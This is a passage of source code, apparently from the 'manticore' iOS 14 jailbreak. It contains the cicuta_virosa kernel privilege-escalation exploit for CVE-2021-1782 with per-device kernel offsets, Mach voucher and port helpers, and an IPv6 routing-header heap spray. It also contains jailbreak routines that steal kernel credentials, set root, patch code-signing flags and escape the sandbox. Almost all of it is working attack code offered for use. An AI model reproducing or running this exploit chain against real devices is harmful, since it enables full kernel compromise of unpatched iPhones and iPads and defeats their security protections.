63 | kc_IOSurfaceClient_vt_0 = 0xFFFFFFF0060109F8;
64 |
65 | OFFSET(task, itk_space) = 0x330;
66 | OFFSET(task, bsd_info) = 0x390;
67 | OFFSET(task, t_flags) = 0x3d8;
68 | }
69 |
70 | static void offsets_iPhone12_18A8395() {
71 | offsets_base_iOS_14_x();
72 |
73 | kc_kernel_map = 0xFFFFFFF0077F2620; // 0x3C88
74 | kc_kernel_task = 0xFFFFFFF0077EE998; // 0x3C88
75 | kc_IOSurfaceClient_vt = 0xFFFFFFF007951D28; // 0xE59E40
76 | kc_IOSurfaceClient_vt_0 = 0xFFFFFFF0087ABB68; // 0xE59E40
77 | }
78 |
79 | static void offsets_iPhone11_18A373() {
80 | offsets_base_iOS_14_x();
81 |
82 | kc_kernel_map = 0xFFFFFFF0076DA618; // 0x3C80
83 | kc_kernel_task = 0xFFFFFFF0076D6998; // 0x3C80
84 | kc_IOSurfaceClient_vt = 0xFFFFFFF00783CDA8; // 0xE3D9D0
85 | kc_IOSurfaceClient_vt_0 = 0xFFFFFFF00867A778; // 0xE3D9D0
86 | }
87 |
88 | static void offsets_iPhone12pro_18C66() {
89 | offsets_base_iOS_14_x();
90 |
91 | kc_kernel_map = 0xFFFFFFF0076C8918; // 0x3C98
92 | kc_kernel_task = 0xFFFFFFF0076C4C80; // 0x3C98
93 | kc_IOSurfaceClient_vt = 0xFFFFFFF0078262A0; // 0xE968B4
94 | kc_IOSurfaceClient_vt_0 = 0xFFFFFFF0086BCB54; // 0xE968B4
95 | }
96 |
97 | static void offsets_iPad4air_18C66() {
98 | offsets_base_iOS_14_x();
99 |
100 | kc_kernel_map = 0xFFFFFFF0076C0918; // 0x3C98
101 | kc_kernel_task = 0xFFFFFFF0076bCC80; // 0x3C98
102 | kc_IOSurfaceClient_vt = 0xFFFFFFF007898050; // 0x10AB36C
103 | kc_IOSurfaceClient_vt_0 = 0xFFFFFFF0089433BC; // 0x10AB36C
104 | }
105 |
106 | static void offsets_iPad8_18B92() {
107 | offsets_base_iOS_14_x();
108 |
109 | kc_kernel_map = 0xFFFFFFF0076a8908; // 0x3C88
110 | kc_kernel_task = 0xFFFFFFF0076a4c80; // 0x3C88
111 | kc_IOSurfaceClient_vt = 0xFFFFFFF0077f9b10; // 0x10AB36C
112 | kc_IOSurfaceClient_vt_0 = 0xFFFFFFF008620f74; // 0x10AB36C
113 | }
114 |
115 | static void offsets_iPhone11_18B92() {
116 | offsets_base_iOS_14_x();
117 |
118 | kc_kernel_map = 0xfffffff0076fc910;
119 | kc_kernel_task = 0xfffffff0076f8c80;
120 | kc_IOSurfaceClient_vt = 0xfffffff00785d7f8;
121 | kc_IOSurfaceClient_vt_0 = 0xfffffff0086dacdc;
122 | }
123 |
124 | struct device_def {
125 | const char *name;
126 | const char *model;
127 | const char *build;
128 | void (*init)(void);
129 | };
130 |
131 | static struct device_def devices[] = {
132 | { "iPad Air 4", "J307AP", "18C66", offsets_iPad4air_18C66 },
133 | { "iPad 8", "J171aAP", "18B92", offsets_iPad8_18B92 },
134 | { "iPhone 6s", "N71AP", "18A373", offsets_iPhone6s_18A373 },
135 | { "iPhone 11", "N104AP", "18A373", offsets_iPhone11_18A373 },
136 | { "iPhone 12", "D53GAP", "18A8395", offsets_iPhone12_18A8395 },
137 | { "iPhone 12 pro", "D53pAP", "18C66", offsets_iPhone12pro_18C66 },
138 | { "iPhone 11", "N104AP", "18B92", offsets_iPhone11_18B92 }
139 | };
140 |
141 | void kernel_offsets_init(void) {
142 | for (int i = 0; i < arrayn(devices); i++) {
143 | struct device_def *dev = &devices[i];
144 | if (!strcmp(g_exp.model, dev->model) && !strcmp(g_exp.osversion, dev->build)) {
145 | dev->init();
146 | return;
147 | }
148 | }
149 | fail_info(("no device defination"));
150 | }
151 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/README.md:
--------------------------------------------------------------------------------
1 | # cicuta_virosa
2 | iOS\iPadOS 14.3 kernel LPE for all devices by **@ModernPwner**. Please follow us on twitter :)
3 |
4 | # Current state
5 | - Exploit works :)
6 | - Need a lot of cleanup + more stable primitives that not relaying on memory reallocation. **Use it on your own risk**
7 | - Exploit will take more then 2 minutes because we can't understand how to properly bypass one stupid sanity check in kernel on "Stage 3: Convert uaf into pktopts uaf" (we'll fix it soon)
8 | - Reliability is amazing on our A13 and A10 devices
9 |
10 | # The vuln
11 | **CVE-2021-1782**: A race condition in user_data_get_value() leading to ivac entry uaf. This issue has been actively exploited in the wild with the WebKit exploit. We might release this RCE chain in the future.
12 |
13 | # Writeup
14 | Soon.
15 |
16 | # How to build it
17 | We don't like to commit Xcode project file. Create your own XCode project, add files and call "cicuta_virosa" function.
18 |
19 | # Credits
20 | - Some utils (exploit_utilities.c): @Jakeashacks
21 | - Vuln: Apple
22 |
23 | # License
24 | If you want to use it in your project under GPL not-compatible license - **please** DM us to get permissions.
25 | We give permissions to **@CStar_OW** to use and modify the exploit for Odyssey - the best jailbreak :).
26 | But we hope that all modifications will be open sourced.
27 |
28 | # PAC bypass
29 | For the moment we have a brand new technique to bypass PAC but we decided to not include such critical stuff here.
30 | **Maybe** we'll post a PAC bypass along with the iOS 14.5 exploit. This is in progress, we **may** publish 14.5 exploit after Apple patch.
31 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/cicuta_log.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | void cicuta_log(const char* format, ...)
6 | {
7 | char *msg = NULL;
8 | va_list ap;
9 | va_start(ap, format);
10 | vasprintf(&msg, format, ap);
11 | printf("%s\n", msg);
12 | va_end(ap);
13 | free(msg);
14 | }
15 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/descriptors_utils.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | void increase_limits(uint32_t limit)
5 | {
6 | struct rlimit lim = {0};
7 | getrlimit(RLIMIT_NOFILE, &lim);
8 | lim.rlim_cur = limit;
9 | setrlimit(RLIMIT_NOFILE, &lim);
10 | }
11 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/exploit_utilities.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | mach_port_t cv_new_mach_port() {
6 | mach_port_t port = MACH_PORT_NULL;
7 | kern_return_t ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
8 | if (ret) {
9 | cicuta_log("[-] failed to allocate port.");
10 | return MACH_PORT_NULL;
11 | }
12 |
13 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
14 | if (ret) {
15 | cicuta_log("[-] failed to insert right.");
16 | mach_port_destroy(mach_task_self(), port);
17 | return MACH_PORT_NULL;
18 | }
19 |
20 | mach_port_limits_t limits = {0};
21 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
22 | ret = mach_port_set_attributes(mach_task_self(), port, MACH_PORT_LIMITS_INFO, (mach_port_info_t)&limits, MACH_PORT_LIMITS_INFO_COUNT);
23 | if (ret) {
24 | cicuta_log("[-] failed to increase queue limit.");
25 | mach_port_destroy(mach_task_self(), port);
26 | return MACH_PORT_NULL;
27 | }
28 |
29 | return port;
30 | }
31 |
32 |
33 | mach_port_t new_mach_port() {
34 | mach_port_t port = MACH_PORT_NULL;
35 | kern_return_t ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
36 | if (ret) {
37 | printf("[-] failed to allocate port.\n");
38 | return MACH_PORT_NULL;
39 | }
40 |
41 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
42 | if (ret) {
43 | printf("[-] failed to insert right.\n");
44 | mach_port_destroy(mach_task_self(), port);
45 | return MACH_PORT_NULL;
46 | }
47 |
48 | mach_port_limits_t limits = {0};
49 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
50 | ret = mach_port_set_attributes(mach_task_self(), port, MACH_PORT_LIMITS_INFO, (mach_port_info_t)&limits, MACH_PORT_LIMITS_INFO_COUNT);
51 | if (ret) {
52 | printf("[-] failed to increase queue limit.\n");
53 | mach_port_destroy(mach_task_self(), port);
54 | return MACH_PORT_NULL;
55 | }
56 |
57 | return port;
58 | }
59 |
60 | kern_return_t send_message(mach_port_t destination, void *buffer, mach_msg_size_t size) {
61 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + size;
62 | struct simple_msg *msg = malloc(msg_size);
63 |
64 | memset(msg, 0, sizeof(struct simple_msg));
65 |
66 | msg->hdr.msgh_remote_port = destination;
67 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
68 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
69 | msg->hdr.msgh_size = msg_size;
70 |
71 | memcpy(&msg->buf[0], buffer, size);
72 |
73 | kern_return_t ret = mach_msg(&msg->hdr, MACH_SEND_MSG, msg_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
74 | if (ret) {
75 | cicuta_log("[-] failed to send message.");
76 | mach_port_destroy(mach_task_self(), destination);
77 | free(msg);
78 | return ret;
79 | }
80 | free(msg);
81 | return KERN_SUCCESS;
82 | }
83 |
84 | struct simple_msg* receive_message(mach_port_t source, mach_msg_size_t size) {
85 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + size;
86 | struct simple_msg *msg = malloc(msg_size);
87 | memset(msg, 0, sizeof(struct simple_msg));
88 |
89 | kern_return_t ret = mach_msg(&msg->hdr, MACH_RCV_MSG, 0, msg_size, source, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
90 | if (ret) {
91 | cicuta_log("[-] failed to receive message: 0x%x (%s).", ret, mach_error_string(ret));
92 | return NULL;
93 | }
94 |
95 | return msg;
96 | }
97 |
98 | int send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition) {
99 | kern_return_t ret;
100 |
101 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count);
102 | for (int i = 0; i < count; i++) {
103 | ports[i] = target_port;
104 | }
105 |
106 | struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));
107 |
108 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
109 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);
110 | msg->hdr.msgh_remote_port = where;
111 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
112 | msg->hdr.msgh_id = 0x41414141;
113 |
114 | msg->body.msgh_descriptor_count = 1;
115 |
116 | msg->ool_ports.address = ports;
117 | msg->ool_ports.count = count;
118 | msg->ool_ports.deallocate = 0;
119 | msg->ool_ports.disposition = disposition;
120 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
121 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
122 |
123 | ret = mach_msg(&msg->hdr, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, msg->hdr.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
124 |
125 | free(msg);
126 | free(ports);
127 |
128 | if (ret) {
129 | cicuta_log("[-] Failed to send OOL message: 0x%x (%s).", ret, mach_error_string(ret));
130 | return KERN_FAILURE;
131 | }
132 |
133 | return 0;
134 | }
135 |
136 | int cv_send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition) {
137 | kern_return_t ret;
138 |
139 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count);
140 | for (int i = 0; i < count; i++) {
141 | ports[i] = target_port;
142 | }
143 |
144 | struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));
145 |
146 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
147 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);
148 | msg->hdr.msgh_remote_port = where;
149 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
150 | msg->hdr.msgh_id = 0x41414141;
151 |
152 | msg->body.msgh_descriptor_count = 1;
153 |
154 | msg->ool_ports.address = ports;
155 | msg->ool_ports.count = count;
156 | msg->ool_ports.deallocate = 0;
157 | msg->ool_ports.disposition = disposition;
158 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
159 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
160 |
161 | ret = mach_msg(&msg->hdr, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, msg->hdr.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
162 |
163 | free(msg);
164 | free(ports);
165 |
166 | if (ret) {
167 | cicuta_log("[-] Failed to send OOL message: 0x%x (%s).", ret, mach_error_string(ret));
168 | return KERN_FAILURE;
169 | }
170 |
171 | return 0;
172 | }
173 |
174 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/fake_element_spray.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | #define IPV6_RTHDR 51
6 |
7 | static uint32_t fake_element_e_size = 0;
8 | static uint32_t fake_element_spray_count = 0;
9 | static int* route_header_spray_sockets = NULL;
10 | static void* route_header = NULL;
11 | static uint32_t route_header_size = 0;
12 |
13 | void init_fake_element_spray(uint32_t e_size, uint32_t count)
14 | {
15 | fake_element_e_size = e_size;
16 | fake_element_spray_count = count;
17 | route_header_spray_sockets = malloc(fake_element_spray_count * sizeof(int));
18 | for (uint32_t i = 0; i < fake_element_spray_count; ++i)
19 | {
20 | route_header_spray_sockets[i] = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
21 | if (route_header_spray_sockets[i] < 0)
22 | {
23 | cicuta_log("Cannot create socket at %d. Error: %d", i, errno);
24 | }
25 | int minmtu = -1;
26 | int res = setsockopt(route_header_spray_sockets[i], IPPROTO_IPV6, IPV6_USE_MIN_MTU, &minmtu, sizeof(minmtu));
27 | if (res != 0)
28 | {
29 | cicuta_log("Cannot preallocate pktopts at %d. Error: %d", i, errno);
30 | }
31 | }
32 |
33 | int header_size = DATA_VOUCHER_CONTENT_SIZE + USER_DATA_ELEMENT_SIZEOF;
34 | int len = ((header_size >> 3) - 1) & ~1;
35 | route_header_size = (len + 1) << 3;
36 | route_header = malloc(route_header_size);
37 | memset(route_header, 0, route_header_size);
38 |
39 | struct ip6_rthdr {
40 | u_int8_t ip6r_nxt; /* next header */
41 | u_int8_t ip6r_len; /* length in units of 8 octets */
42 | u_int8_t ip6r_type; /* routing type */
43 | u_int8_t ip6r_segleft; /* segments left */
44 | /* followed by routing type specific data */
45 | } __attribute__((__packed__));
46 |
47 | struct ip6_rthdr* rthdr = (struct ip6_rthdr *)route_header;
48 | rthdr->ip6r_nxt = 0;
49 | rthdr->ip6r_len = len;
50 | rthdr->ip6r_type = IPV6_RTHDR_TYPE_0;
51 | rthdr->ip6r_segleft = rthdr->ip6r_len >> 1;
52 | }
53 |
54 | void fake_element_spray_set_e_size(uint32_t e_size){
55 | fake_element_e_size = e_size;
56 | }
57 |
58 | void fake_element_spray_set_pktopts(uint64_t pktopts){
59 | uint64_t* fake_element = route_header;
60 | fake_element[2] = pktopts;
61 | }
62 |
63 | void release_fake_element_spray_at(uint32_t index){
64 | close(route_header_spray_sockets[index]);
65 | route_header_spray_sockets[index] = - 1;
66 | }
67 |
68 | void release_all_fake_element_spray(void) {
69 | for (uint32_t i = 0; i < fake_element_spray_count; ++i) {
70 | release_fake_element_spray_at(i);
71 | }
72 |
73 | free(route_header_spray_sockets);
74 | free(route_header);
75 | fake_element_e_size = 0;
76 | fake_element_spray_count = 0;
77 | route_header_size = 0;
78 | }
79 |
80 | void perform_fake_element_spray(void) {
81 | ((uint32_t*)route_header)[1] = fake_element_e_size;
82 | uint64_t* element_content = (uint64_t*)((char*)route_header + USER_DATA_ELEMENT_SIZEOF);
83 | for (uint32_t i = 0; i < fake_element_spray_count; ++i){
84 | element_content[0] = FAKE_ELEMENT_MAGIC_BASE + i;
85 | int res = setsockopt(route_header_spray_sockets[i], IPPROTO_IPV6, IPV6_RTHDR, route_header, route_header_size);
86 | if (res != 0){
87 | usleep(2);
88 | res = setsockopt(route_header_spray_sockets[i], IPPROTO_IPV6, IPV6_RTHDR, route_header, route_header_size);
89 | if (res != 0){
90 | // printf("Cannot spray rthdr at %d. Error: %d\n", i, errno);
91 | }
92 | }
93 | }
94 |
95 | }
96 |
97 | void set_fake_queue_chain_for_fake_element_spray(uint64_t next, uint64_t prev){
98 | uint64_t* fake_element = route_header;
99 | fake_element[2] = next;
100 | fake_element[3] = prev;
101 | }
102 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/voucher_utils.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | host_name_port_t host = MACH_PORT_NULL;
6 |
7 | kern_return_t create_voucher(mach_voucher_attr_recipe_t recipe, ipc_voucher_t* voucher) {
8 | if (host == MACH_PORT_NULL){
9 | host = mach_host_self();
10 | }
11 |
12 | return host_create_mach_voucher(host, (mach_voucher_attr_raw_recipe_array_t)recipe, sizeof(*recipe) + recipe->content_size, voucher);
13 | }
14 |
15 | kern_return_t create_user_data_voucher_fast(uint64_t id, ipc_voucher_t* voucher){
16 | mach_voucher_attr_recipe_t recipe = create_recipe_for_user_data_voucher(id);
17 | kern_return_t kr = create_voucher(recipe, voucher);
18 | free(recipe);
19 | return kr;
20 | }
21 |
22 | mach_voucher_attr_recipe_data_t* create_recipe_for_user_data_voucher(uint64_t id){
23 | mach_voucher_attr_recipe_t recipe = malloc(sizeof(mach_voucher_attr_recipe_data_t) + DATA_VOUCHER_CONTENT_SIZE);
24 | memset(recipe, 0, sizeof(mach_voucher_attr_recipe_data_t));
25 | recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
26 | recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;
27 | recipe->content_size = DATA_VOUCHER_CONTENT_SIZE;
28 | uint64_t* content = (uint64_t*)recipe->content;
29 | content[0] = 0x4141414141414141;
30 | content[1] = id;
31 | return recipe;
32 | }
33 |
34 | kern_return_t destroy_voucher(mach_port_t voucher){
35 | return mach_port_destroy(mach_task_self(), voucher);
36 | }
37 |
--------------------------------------------------------------------------------
/manticore/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleDisplayName
8 | Manticore
9 | CFBundleExecutable
10 | $(EXECUTABLE_NAME)
11 | CFBundleIdentifier
12 | $(PRODUCT_BUNDLE_IDENTIFIER)
13 | CFBundleInfoDictionaryVersion
14 | 6.0
15 | CFBundleName
16 | $(PRODUCT_NAME)
17 | CFBundlePackageType
18 | $(PRODUCT_BUNDLE_PACKAGE_TYPE)
19 | CFBundleShortVersionString
20 | $(MARKETING_VERSION)
21 | CFBundleVersion
22 | $(CURRENT_PROJECT_VERSION)
23 | LSRequiresIPhoneOS
24 |
25 | UIApplicationSupportsIndirectInputEvents
26 |
27 | UILaunchStoryboardName
28 | LaunchScreen
29 | UIMainStoryboardFile
30 | Main
31 | UIRequiredDeviceCapabilities
32 |
33 | armv7
34 |
35 | UISupportedInterfaceOrientations
36 |
37 | UIInterfaceOrientationPortrait
38 | UIInterfaceOrientationLandscapeLeft
39 | UIInterfaceOrientationLandscapeRight
40 |
41 | UISupportedInterfaceOrientations~ipad
42 |
43 | UIInterfaceOrientationPortrait
44 | UIInterfaceOrientationPortraitUpsideDown
45 | UIInterfaceOrientationLandscapeLeft
46 | UIInterfaceOrientationLandscapeRight
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/manticore/Jailbreak/jailbreak.mm:
--------------------------------------------------------------------------------
1 | //
2 | // jailbreak.m
3 | // reton
4 | //
5 | // Created by Luca on 15.02.21.
6 | //
7 |
8 | #include "ViewController.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 | #include
23 | #include
24 | #include
25 | #include
26 | #include
27 | #include
28 | #include
29 |
30 | #define JAILB_ROOT "/private/var/containers/Bundle/jb_resources/"
31 | static const char *jailb_root = JAILB_ROOT;
32 | #define CPU_SUBTYPE_ARM64E ((cpu_subtype_t) 2)
33 |
34 | cpu_subtype_t get_cpu_subtype() {
35 | cpu_subtype_t ret = 0;
36 | cpu_subtype_t *cpu_subtype = NULL;
37 | size_t *cpu_subtype_size = NULL;
38 | cpu_subtype = (cpu_subtype_t *)malloc(sizeof(cpu_subtype_t));
39 | bzero(cpu_subtype, sizeof(cpu_subtype_t));
40 | cpu_subtype_size = (size_t *)malloc(sizeof(size_t));
41 | bzero(cpu_subtype_size, sizeof(size_t));
42 | *cpu_subtype_size = sizeof(cpu_subtype_size);
43 | if (sysctlbyname("hw.cpusubtype", cpu_subtype, cpu_subtype_size, NULL, 0) != 0) return 0;
44 | ret = *cpu_subtype;
45 | return ret;
46 | }
47 |
48 | #define IS_PAC (get_cpu_subtype() == CPU_SUBTYPE_ARM64E)
49 |
50 | extern "C" int jailbreak() {
51 | printf("* ------- Applying Patches ------- *\n");
52 | struct proc_cred *old_cred;
53 | proc_set_root_cred(g_exp.self_proc, &old_cred);
54 | util_msleep(100);
55 | int err = setuid(0);
56 | if (err) perror("setuid");
57 | patch_TF_PLATFORM(g_exp.self_task);
58 | uint64_t csflags = read_32(g_exp.self_proc + OFFSET(proc, csflags));
59 | uint64_t csflags_mod = (csflags|0xA8|0x0000008|0x0000004|0x10000000)&~(0x0000800|0x0000100|0x0000200);
60 | printf("CS Flags:\t0x%llx | 0x%llx\n", csflags, csflags_mod);
61 | prepare_fake_entitlements();
62 | self_macf = proc_fetch_MACF(g_exp.self_proc);
63 | patch_codesign();
64 | printf("Codessign patched");
65 | printf("Goodbye!\n");
66 | return 0;
67 | }
68 |
69 | bool check_sandbox_escape(void){
70 | [[NSFileManager defaultManager] createFileAtPath:@"/var/mobile/escaped" contents:nil attributes:nil];
71 | if([[NSFileManager defaultManager] fileExistsAtPath:@"/var/mobile/escaped"]){
72 | [[NSFileManager defaultManager] removeItemAtPath:@"/var/mobile/escaped" error:nil];
73 | return true;
74 | } else {
75 | return false;
76 | }
77 | }
78 |
79 | int install_bootstrap(void){
80 | return 0;
81 | }
82 |
83 | int sb_allow_ndefault(void) {
84 | // Allow SpringBoard to show non-default system apps.
85 | if(modifyPlist(@"/var/mobile/Library/Preferences/com.apple.springboard.plist", ^(id plist) { plist[@"SBShowNonDefaultSystemApps"] = @YES; }))
86 | return 1;
87 | return 0;
88 | }
89 |
90 | bool setup_manticore_filesystem(void){
91 | NSString *jailbreakDirBasePath = @"/var/mobile/.manticore/";
92 | NSString *jailbreakPlistPath = [NSString stringWithFormat:@"%@jailbreak.plist", jailbreakDirBasePath];
93 | if([[NSFileManager defaultManager] fileExistsAtPath:@"/var/mobile/.manticore/"] && [[NSFileManager defaultManager] fileExistsAtPath:jailbreakPlistPath]) {
94 | return YES;
95 | } else {
96 | printf("Initial installation of manticore starting...\n");
97 |
98 | // Create /var/mobile/.manticore folder for jailbreak/project specific files
99 | if(![[NSFileManager defaultManager] fileExistsAtPath:jailbreakDirBasePath]) [[NSFileManager defaultManager] createDirectoryAtPath:jailbreakDirBasePath withIntermediateDirectories:YES attributes:nil error:NULL];
100 | else return NO;
101 |
102 | // Create jailbreak.plist
103 | if(![[NSFileManager defaultManager] fileExistsAtPath:jailbreakPlistPath]) createEmptyPlist(jailbreakPlistPath);
104 | else return NO;
105 | return 0;
106 | }
107 | return NO;
108 | }
109 |
--------------------------------------------------------------------------------
/manticore/Jailbreak/kernel_utils.mm:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_u.m
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #import
9 | #include
10 | #include
11 |
12 | #include "log.hpp"
13 | #include "kernel_utils.h"
14 | #include "utils.h"
15 |
16 | #include
17 | #include
18 |
19 | #include
20 | #include
21 | #include
22 | #include
23 | #include
24 | #include
25 |
26 | #include
27 |
28 | #if 1
29 | #define MAX_CHUNK 0xff0
30 | #else
31 | #define MAX_CHUNK 0x2000
32 | #endif
33 |
34 | mach_port_t tfp0 = MACH_PORT_NULL;
35 | uint64_t kreads = 0;
36 | uint64_t kwrites = 0;
37 |
38 | typedef struct __attribute__((packed)) {
39 | struct {
40 | uint64_t data;
41 | uint32_t reserved : 24;
42 | uint32_t type : 8;
43 | uint32_t pad;
44 | } lock; // mutex lock
45 | uint32_t ref_count;
46 | uint32_t active;
47 | uint32_t halting;
48 | uint32_t pad;
49 | uint64_t map;
50 | } ktask_t;
51 |
52 | bool set_platform_binary(kptr_t proc, bool set) {
53 | bool ret = false;
54 | if(!KERN_POINTER_VALID(proc)) return 0; // what the fuck? proc needs to be invalid?
55 | kptr_t task_struct_addr = read_64(proc + 0x10);
56 | if(!KERN_POINTER_VALID(task_struct_addr)) return 0;
57 | kptr_t task_t_flags_addr = task_struct_addr + 0x3a0;
58 | uint32_t task_t_flags = read_32(task_t_flags_addr);
59 | if (set) {
60 | task_t_flags |= TF_PLATFORM;
61 | } else {
62 | task_t_flags &= ~(TF_PLATFORM);
63 | }
64 | // write_32((task_struct_addr + 0x3a0), (void*)task_t_flags);
65 | ret = true;
66 | return ret;
67 | }
68 |
69 | kptr_t give_creds_to_proc_at_addr(kptr_t proc, kptr_t creds) {
70 | // should never recieve invalid values
71 | MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(proc));
72 | MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(creds));
73 |
74 | auto our_creds = proc + OFFSET(proc, p_ucred); // current creds of the proc
75 | auto old_creds = kapi_read_kptr(our_creds); // store them for restoration later
76 |
77 | if (KERN_POINTER_INVALID(old_creds)) {
78 | manticore_warn("[give_creds_to_proc_at_addr] old_creds invalid value: %#0llx", old_creds);
79 | return (kptr_t)NULL;
80 | } else manticore_info("[give_creds_to_proc_at_addr] old_creds stored at %#0llx", old_creds);
81 |
82 | if(g_exp.debug){
83 | printf("---> Trying to steal creds @0x%llx's...\n", proc);
84 | kptr_t cred_posix = creds + OFFSET(ucred, cr_posix);
85 | size_t cred_posix_size = SIZE(posix_cred);
86 | char stolen_cred[cred_posix_size];
87 | struct proc_cred *cred_label;
88 |
89 | if(cred_posix_size > sizeof(cred_label->posix_cred)){
90 | printf("Error:\tstruct proc_cred should be bigger.");
91 | exit(0);
92 | }
93 |
94 | cred_label = (struct proc_cred *)malloc(sizeof(*cred_label));
95 | kapi_read(cred_posix, cred_label->posix_cred, cred_posix_size);
96 | cred_label->cr_label = kapi_read64(cred_posix + SIZE(posix_cred));
97 | cred_label->sandbox_slot = 0;
98 |
99 | if(cred_label->cr_label) {
100 | kptr_t cr_label = cred_label->cr_label | 0xffffff8000000000;
101 | cred_label->sandbox_slot = kapi_read64(cr_label + 0x10);
102 | kapi_write64(cr_label + 0x10, 0x0);
103 | }
104 |
105 | // TODO: fix this function by trnalsating it from proc_set_root_cred
106 |
107 | kapi_write(cred_posix, stolen_cred, cred_posix_size);
108 | printf("---> Done\n");
109 | }
110 |
111 | // kapi_write64(our_creds, creds); // update creds
112 |
113 | return old_creds;
114 | }
115 |
116 | bool execute_with_credentials(kptr_t proc, kptr_t creds, void (^function)(void)) {
117 | MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(proc));
118 | MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(creds));
119 | MANTICORE_THROW_ON_NULL(function);
120 |
121 | auto old_creds = give_creds_to_proc_at_addr(proc, creds);
122 |
123 | if (KERN_POINTER_INVALID(old_creds)) {
124 | manticore_warn("[execute_with_credentials] old_creds invalid value: %#0llx", old_creds);
125 | return false;
126 | }
127 |
128 | function();
129 |
130 | return (bool)give_creds_to_proc_at_addr(proc, old_creds);
131 | }
132 |
133 | kptr_t get_kernel_cred_addr(){
134 | MANTICORE_THROW_ON_FALSE(KERN_POINTER_VALID(g_exp.kernel_proc));
135 | auto k_ucred = kapi_read_kptr(g_exp.kernel_proc + OFFSET(proc, p_ucred));
136 |
137 | if (KERN_POINTER_INVALID(k_ucred)) {
138 | manticore_warn("[get_kernel_cred_addr] k_ucred invalid value: %#0llx", k_ucred);
139 | return (kptr_t)NULL;
140 | } else manticore_info("[get_kernel_cred_addr] kernel credits found @ 0x%llx", k_ucred);
141 |
142 | return k_ucred;
143 | }
144 |
145 | bool execute_with_kernel_credentials(void (^function)(void)){
146 | auto k_cred = get_kernel_cred_addr();
147 |
148 | uint32_t data[10] = {};
149 | kapi_read(g_exp.self_proc + OFFSET(proc, p_ucred), data, sizeof(data));
150 | util_hexprint(data, sizeof(data), "owncreds");
151 |
152 | printf("\n\n");
153 |
154 | uint32_t data2[10] = {};
155 | kapi_read(k_cred, data2, sizeof(data2));
156 | util_hexprint(data2, sizeof(data2), "kerncreds");
157 |
158 | if (KERN_POINTER_INVALID(k_cred)) {
159 | manticore_warn("[execute_with_kernel_credentials] k_cred invalid value: %#0llx", k_cred);
160 | return false;
161 | }
162 |
163 | if (!execute_with_credentials(g_exp.self_proc, k_cred, function)) {
164 | manticore_warn("[execute_with_kernel_credentials] failed to execute as kernel :(");
165 | return false;
166 | } else manticore_info("[execute_with_kernel_credentials] successfully executed as kernel :)");
167 |
168 | return true;
169 | }
170 |
171 |
172 |
173 | uint64_t proc_of_pid(pid_t pid) {
174 | // uint64_t proc = read_64(find_allproc()), pd;
175 | // while (proc) { //iterate over all processes till we find the one we're looking for
